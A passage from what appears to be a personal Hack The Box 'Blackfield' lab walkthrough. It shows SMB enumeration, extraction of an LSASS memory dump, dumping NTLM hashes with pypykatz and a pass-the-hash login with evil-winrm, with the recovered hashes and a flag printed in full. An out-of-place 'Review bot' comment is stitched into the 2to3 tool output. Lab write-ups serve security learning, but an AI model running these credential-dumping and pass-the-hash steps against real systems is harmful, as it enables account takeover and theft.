└─$ 

Checking the shares for this user: crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password123!' --shares

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb  10.10.10.192 -u audit2020 -p 'Password123!' --shares
SMB         10.10.10.192    445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\audit2020:Password123! 
SMB         10.10.10.192    445    DC01             [+] Enumerated shares
SMB         10.10.10.192    445    DC01             Share           Permissions     Remark
SMB         10.10.10.192    445    DC01             -----           -----------     ------
SMB         10.10.10.192    445    DC01             ADMIN$                          Remote Admin
SMB         10.10.10.192    445    DC01             C$                              Default share
SMB         10.10.10.192    445    DC01             forensic        READ            Forensic / Audit share.
SMB         10.10.10.192    445    DC01             IPC$            READ            Remote IPC
SMB         10.10.10.192    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.10.10.192    445    DC01             profiles$       READ            
SMB         10.10.10.192    445    DC01             SYSVOL          READ            Logon server share 
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

We can now read the forensic share.

We open it using smbclient: smbclient \\10.10.10.192\forensic -U audit2020%'Password123!'. I then get all the txt files I see.

└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                5102079 blocks of size 4096. 1678453 blocks available
smb: \> cd commands_output 
smb: \commands_output\> ls
  .                                   D        0  Sun Feb 23 13:14:37 2020
  ..                                  D        0  Sun Feb 23 13:14:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 08:00:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 07:51:52 2020
  domain_users.txt                    A    16454  Fri Feb 28 17:32:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 07:53:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 07:50:28 2020
  netstat.txt                         A     3842  Sun Feb 23 07:51:01 2020
  route.txt                           A     3976  Sun Feb 23 07:53:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 07:56:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 07:54:29 2020

                5102079 blocks of size 4096. 1678453 blocks available
smb: \commands_output\> cat domain_users.txt
cat: command not found
smb: \commands_output\> get domain_admins.txt
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \commands_output\> get *.txt
NT_STATUS_OBJECT_NAME_INVALID opening remote file \commands_output\*.txt
smb: \commands_output\> get domain_groups.txt
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (0.7 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \commands_output\> get domain_users.txt
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (11.7 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \commands_output\> 

When we cat domain_users.txt we see a new user, Ipwn3dYouCompany.

BLACKFIELD969352         BLACKFIELD971417         BLACKFIELD978938         
BLACKFIELD990638         BLACKFIELD991588         BLACKFIELD994577         
BLACKFIELD995218         BLACKFIELD996878         BLACKFIELD997545         
BLACKFIELD998321         Guest                    Ipwn3dYouCompany
krbtgt                   lydericlefebvre          support           
Ipwn3dYouCompany

I'll try and see if we can get the hash.

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/Ipwn3dYouCompany         

Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
                                                                                                                     
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]

Check the other folder.

└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

                5102079 blocks of size 4096. 1678438 blocks available
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
  .                                   D        0  Thu May 28 16:28:33 2020
  ..                                  D        0  Thu May 28 16:28:33 2020
  conhost.zip                         A 37876530  Thu May 28 16:25:36 2020
  ctfmon.zip                          A 24962333  Thu May 28 16:25:45 2020
  dfsrs.zip                           A 23993305  Thu May 28 16:25:54 2020
  dllhost.zip                         A 18366396  Thu May 28 16:26:04 2020
  ismserv.zip                         A  8810157  Thu May 28 16:26:13 2020
  lsass.zip                           A 41936098  Thu May 28 16:25:08 2020
  mmc.zip                             A 64288607  Thu May 28 16:25:25 2020
  RuntimeBroker.zip                   A 13332174  Thu May 28 16:26:24 2020
  ServerManager.zip                   A 131983313  Thu May 28 16:26:49 2020
  sihost.zip                          A 33141744  Thu May 28 16:27:00 2020
  smartscreen.zip                     A 33756344  Thu May 28 16:27:11 2020
  svchost.zip                         A 14408833  Thu May 28 16:27:19 2020
  taskhostw.zip                       A 34631412  Thu May 28 16:27:30 2020
  winlogon.zip                        A 14255089  Thu May 28 16:27:38 2020
  wlms.zip                            A  4067425  Thu May 28 16:27:44 2020
  WmiPrvSE.zip                        A 18303252  Thu May 28 16:27:53 2020

                5102079 blocks of size 4096. 1678438 blocks available
smb: \memory_analysis\> 


I gave this output to ChatGPT, asked it "anything interesting you see here?", and it told me:

lsass.zip: This stands out immediately. LSASS (Local Security Authority Subsystem Service) manages the system’s authentication policy and might contain authentication credentials in memory. Attackers frequently target this process to extract clear-text passwords, hashes, Kerberos tickets, etc. Tools like Mimikatz can parse LSASS memory dumps for credentials.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass 
cd: no such file or directory: lsass
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json  blackfield        cleaned_users.txt  domain_users.txt  users2.txt
20230910090640_domains.json    blackfield.gnmap  cleanusers2.txt    kerbrute          users.txt
20230910090640_groups.json     blackfield.nmap   domain_admins.txt  lsass.DMP
20230910090640_users.json      blackfield.xml    domain_groups.txt  lsass.zip
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cd lsass.DMP
cd: not a directory: lsass.DMP
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

Googled how to work with this lsass.DMP.

Following this article.

Get mimikatz.py and cp it to the blackfield folder.

nt.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23657 (23K) [text/plain]
Saving to: ‘mimikatz.py’

mimikatz.py                   100%[==============================================>]  23.10K  --.-KB/s    in 0.002s  

2023-09-10 10:10:12 (10.7 MB/s) - ‘mimikatz.py’ saved [23657/23657]

                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ ls                                   
 10.10.10.175:80                BloodHound-linux-x64.zip          'mimikatz(1).exe'     System.ValueTuple.dll
 10.10.10_files                 code_1.81.1-1691620686_amd64.deb   mimikatz.exe         Win32
 aclpwn.py                      Invoke-Mimikatz.ps1                mimikatz.py          winPEASx64.exe
 Bloodhound_3                   kerbrute_linux_amd64               mimikatz_trunk       winPEASx86.exe
 BloodHound-3.0.5.zip           kiwi_passwords.yar                 mimikatz_trunk.zip   x64
'BloodHound-linux-x64(1).zip'   mimicom.idl                        README.md
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ cp mimikatz.py ~/HTB/blackfield      
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads]
└─$ 

Modified mimikatz.py so it can run with python3, a recommendation by ChatGPT after I got the error.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$  2to3 -w mimikatz.py 
/usr/bin/2to3:3: DeprecationWarning: lib2to3 package is deprecated and may not be able to parse Python 3.10+
  from lib2to3.main import main
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored mimikatz.py
--- mimikatz.py (original)
+++ mimikatz.py (refactored)
@@ -296,12 +296,12 @@
     return cleartext
 
   def dump(self):
-    print 'Dumping LSA Decryptor'
-    print '     IV ({}): {}'.format(len(self.iv), self.iv.encode('hex'))
-    print 'DES_KEY ({}): {}'.format(
-        len(self.des_key), self.des_key.encode('hex'))
-    print 'AES_KEY ({}): {}'.format(
-        len(self.aes_key), self.aes_key.encode('hex'))
+    print('Dumping LSA Decryptor')
+    print('     IV ({}): {}'.format(len(self.iv), self.iv.encode('hex')))
+    print('DES_KEY ({}): {}'.format(
+        len(self.des_key), self.des_key.encode('hex')))
+    print('AES_KEY ({}): {}'.format(
+        len(self.aes_key), self.aes_key.encode('hex')))
 
     
 class LsaDecryptor_x86(LsaDecryptor, Mimikatz_x86):
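Review bot: the refactored dump() still calls `self.iv.encode('hex')`, `self.des_key.encode('hex')` and `self.aes_key.encode('hex')`; 2to3 only wrapped the print statements, and on Python 3 the `'hex'` codec no longer exists for str, while a bytes value (which is what these keys will be once the dump is parsed under Python 3) has no `.encode` at all, so dump() raises as soon as it is called. Replace each with `binascii.hexlify(self.iv)` (or `self.iv.hex()`) before relying on this script.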
RefactoringTool: Files that were modified:
RefactoringTool: mimikatz.py
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 


Had to install the missing dependency "construct".

└─$ python3 mimikatz.py
Traceback (most recent call last):
  File "/home/kali/HTB/blackfield/mimikatz.py", line 31, in <module>
    import construct
ModuleNotFoundError: No module named 'construct'
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install construct

Defaulting to user installation because normal site-packages is not writeable
Collecting construct
  Downloading construct-2.10.68.tar.gz (57 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 57.9/57.9 kB 743.5 kB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
Building wheels for collected packages: construct
  Building wheel for construct (setup.py) ... done
  Created wheel for construct: filename=construct-2.10.68-py3-none-any.whl size=59223 sha256=179a525c80f0ba0da8cea12f3129cb9dd0057e596e5043292f28804f35adecbc
  Stored in directory: /home/kali/.cache/pip/wheels/6a/5b/a1/35e70b419451f0f619898c0f9ec10f3d920721daed7bc24eab
Successfully built construct
Installing collected packages: construct
Successfully installed construct-2.10.68

Had to install volatility, again a missing dependency.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ python3 mimikatz.py   
Traceback (most recent call last):
  File "/home/kali/HTB/blackfield/mimikatz.py", line 35, in <module>
    import volatility.obj as obj
ModuleNotFoundError: No module named 'volatility'
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pip3 install volatility3

Defaulting to user installation because normal site-packages is not writeable
Collecting volatility3
  Downloading volatility3-2.4.1-py3-none-any.whl (687 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 687.5/687.5 kB 3.0 MB/s eta 0:00:00
Requirement already satisfied: pefile>=2017.8.1 in /usr/lib/python3/dist-packages (from volatility3) (2023.2.7)
Installing collected packages: volatility3
  WARNING: The scripts vol and volshell are installed in '/home/kali/.local/bin' which is not on PATH.
  Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
Successfully installed volatility3-2.4.1
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

Many issues, only to realise we have mimikatz.py under impacket.


┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ locate mimikatz.py  
/usr/share/doc/python3-impacket/examples/mimikatz.py
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

I try to run mimikatz.py.

└─$ python3 /usr/share/doc/python3-impacket/examples/mimikatz.py
Impacket v0.11.0 - Copyright 2023 Fortra

usage: mimikatz.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                   [-dc-ip ip address] [-target-ip ip address]
                   target

SMB client implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -file FILE            input file with commands to execute in the mini shell
  -debug                Turn DEBUG output ON

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on
                        target parameters. If valid credentials cannot be found, it will use the ones specified in
                        the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

connection:
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN)
                        specified in the target parameter
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target.
                        This is useful when target is the NetBIOS name and you cannot resolve it
                                                                                                  

I am going to run the mimikatz exe with wine instead.

Have to install wine on my Kali.

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo dpkg --add-architecture i386 
sudo apt update

Get:1 http://packages.microsoft.com/repos/code stable InRelease [3,569 B]
Get:2 http://packages.microsoft.com/repos/code stable/main armhf Packages [79.5 kB]                                 
Hit:4 http://deb.debian.org/debian oldstable InRelease                                              
Get:5 http://packages.microsoft.com/repos/code stable/main arm64 Packages [79.2 kB]                
Get:6 http://packages.microsoft.com/repos/code stable/main amd64 Packages [78.6 kB]    
Hit:3 http://kali.download/kali kali-rolling InRelease                                                              
Hit:7 https://debian.neo4j.com stable InRelease                                
Get:8 http://deb.debian.org/debian oldstable/main i386 Packages [8,122 kB]
Get:9 http://kali.download/kali kali-rolling/main i386 Packages [19.1 MB]
Get:10 https://debian.neo4j.com stable/3.5 i386 Packages [10.2 kB] 
Get:11 http://deb.debian.org/debian oldstable/main i386 Contents (deb) [10.2 MB]                        
Get:12 http://kali.download/kali kali-rolling/main i386 Contents (deb) [43.8 MB]  
Get:13 http://deb.debian.org/debian oldstable/contrib i386 Packages [45.4 kB]                                       
Get:14 http://deb.debian.org/debian oldstable/contrib i386 Contents (deb) [33.6 kB]                                 
Get:15 http://deb.debian.org/debian oldstable/non-free i386 Packages [79.3 kB]                                      
Get:16 http://deb.debian.org/debian oldstable/non-free i386 Contents (deb) [29.2 kB]                                
Get:17 http://kali.download/kali kali-rolling/non-free i386 Packages [176 kB]                                       
Get:18 http://kali.download/kali kali-rolling/non-free i386 Contents (deb) [862 kB]                                 
Get:19 http://kali.download/kali kali-rolling/contrib i386 Packages [99.9 kB]                                       
Get:20 http://kali.download/kali kali-rolling/contrib i386 Contents (deb) [138 kB]                                  
Fetched 83.0 MB in 23s (3,545 kB/s)                                                                                 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
13 packages can be upgraded. Run 'apt list --upgradable' to see them.
W: http://packages.microsoft.com/repos/code/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://deb.debian.org/debian/dists/oldstable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: http://http.kali.org/kali/dists/kali-rolling/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: The key(s) in the keyring /etc/apt/trusted.gpg.d/neo4j-archive-keyring.gpg are ignored as the file has an unsupported filetype.
W: https://debian.neo4j.com/dists/stable/InRelease: Key is stored in legacy trusted.gpg keyring (/etc/apt/trusted.gpg), see the DEPRECATION section in apt-key(8) for details.
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo apt install wine64

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done

mimikatz fails me 🙁

mimikatz # sekurlsa::minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'

mimikatz # sekurlsa::logonpasswords
Opening : 'lsass.DMP' file for minidump...
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

mimikatz #

There is an implementation of mimikatz in Python called pypykatz.

Installing it via pip.

└─$ pip3 install pypykatz
Defaulting to user installation because normal site-packages is not writeable
DEPRECATION: Loading egg at /usr/local/lib/python3.11/dist-packages/volatility-2.6.1-py3.11.egg is deprecated. pip 23.3 will enforce this behaviour change. A possible replacement is to use pip for package installation..
Requirement already satisfied: pypykatz in /usr/lib/python3/dist-packages (0.6.6)
Requirement already satisfied: aesedb>=0.1.3 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.3)
Requirement already satisfied: aiosmb>=0.4.4 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.4)
Requirement already satisfied: aiowinreg>=0.0.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.7)
Requirement already satisfied: minidump>=0.0.21 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.21)
Requirement already satisfied: minikerberos>=0.4.0 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.0)
Requirement already satisfied: msldap>=0.4.7 in /usr/lib/python3/dist-packages (from pypykatz) (0.4.7)
Requirement already satisfied: tqdm in /usr/lib/python3/dist-packages (from pypykatz) (4.64.1)
Requirement already satisfied: unicrypto>=0.0.10 in /usr/lib/python3/dist-packages (from pypykatz) (0.0.10)
Requirement already satisfied: winacl>=0.1.6 in /usr/lib/python3/dist-packages (from pypykatz) (0.1.7)
Requirement already satisfied: colorama in /usr/lib/python3/dist-packages (from aesedb>=0.1.3->pypykatz) (0.4.6)
Requirement already satisfied: asyauth>=0.0.8 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.0.9)
Requirement already satisfied: asysocks>=0.2.2 in /usr/lib/python3/dist-packages (from aiosmb>=0.4.4->pypykatz) (0.2.2)
Requirement already satisfied: asn1crypto>=1.3.0 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.5.1)
Requirement already satisfied: oscrypto>=1.2.1 in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.3.0)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from minikerberos>=0.4.0->pypykatz) (1.16.0)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from unicrypto>=0.0.10->pypykatz) (3.11.0)
Requirement already satisfied: cryptography>=38.0.1 in /usr/lib/python3/dist-packages (from winacl>=0.1.6->pypykatz) (38.0.4)

I asked ChatGPT for the command and it gave me: pypykatz lsa minidump lsass.DMP -o output.txt

┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ pypykatz lsa minidump lsass.DMP -o output.txt

INFO:pypykatz:Parsing file lsass.DMP
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json  blackfield        cleaned_users.txt  domain_users.txt  mimikatz.exe     users2.txt
20230910090640_domains.json    blackfield.gnmap  cleanusers2.txt    kerbrute          mimikatz.py      users.txt
20230910090640_groups.json     blackfield.nmap   domain_admins.txt  lsass.DMP         mimikatz.py.bak  volatility
20230910090640_users.json      blackfield.xml    domain_groups.txt  lsass.zip         output.txt
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ 

We get hashes for administrator and for svc_backup.

administrator

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
        == MSV ==
                Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
                DPAPI: 240339f898b6ac4ce3f34702e4a89550
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: Administrator
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [25869]==
                username Administrator
                domainname BLACKFIELD
                password None
                password (hex)
        == DPAPI [25869]==
                luid 153705
                key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
                masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
                sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9


svc_backup

FILE: ======== lsass.DMP =======

== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
        == MSV ==
                Username: svc_backup
                Domain: BLACKFIELD
                LM: NA
                NT: 9658d1d1dcd9250115e2205d9f48400d
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
                DPAPI: a03cd8e9d30171f3cfe8caad92fef621
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)
        == Kerberos ==
                Username: svc_backup
                Domain: BLACKFIELD.LOCAL
        == WDIGEST [633ba]==
                username svc_backup
                domainname BLACKFIELD
                password None
                password (hex)

Using evil-winrm on both.

administrator – no luck.

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ crackmapexec winrm 10.10.10.161 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

[*] completed: 100.00% (1/1)
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u  Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

svc_backup – phew, we are in and get a flag.

┌──(kali㉿kali)-[~/Downloads/x64]
└─$ evil-winrm -i 10.10.10.192 -u  svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../
*Evil-WinRM* PS C:\Users\svc_backup> cd dektop
Cannot find path 'C:\Users\svc_backup\dektop' because it does not exist.
At line:1 char:1
+ cd dektop
+ ~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\svc_backup\dektop:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand
*Evil-WinRM* PS C:\Users\svc_backup> cd Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat users.txt
Cannot find path 'C:\Users\svc_backup\Desktop\users.txt' because it does not exist.
At line:1 char:1
+ cat users.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\svc_backup\Desktop\users.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> ls


    Directory: C:\Users\svc_backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   2:26 PM             32 user.txt


*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cat user.txt
3920bb317a0bef51027e2852be64b543

Privilege escalation – to be continued.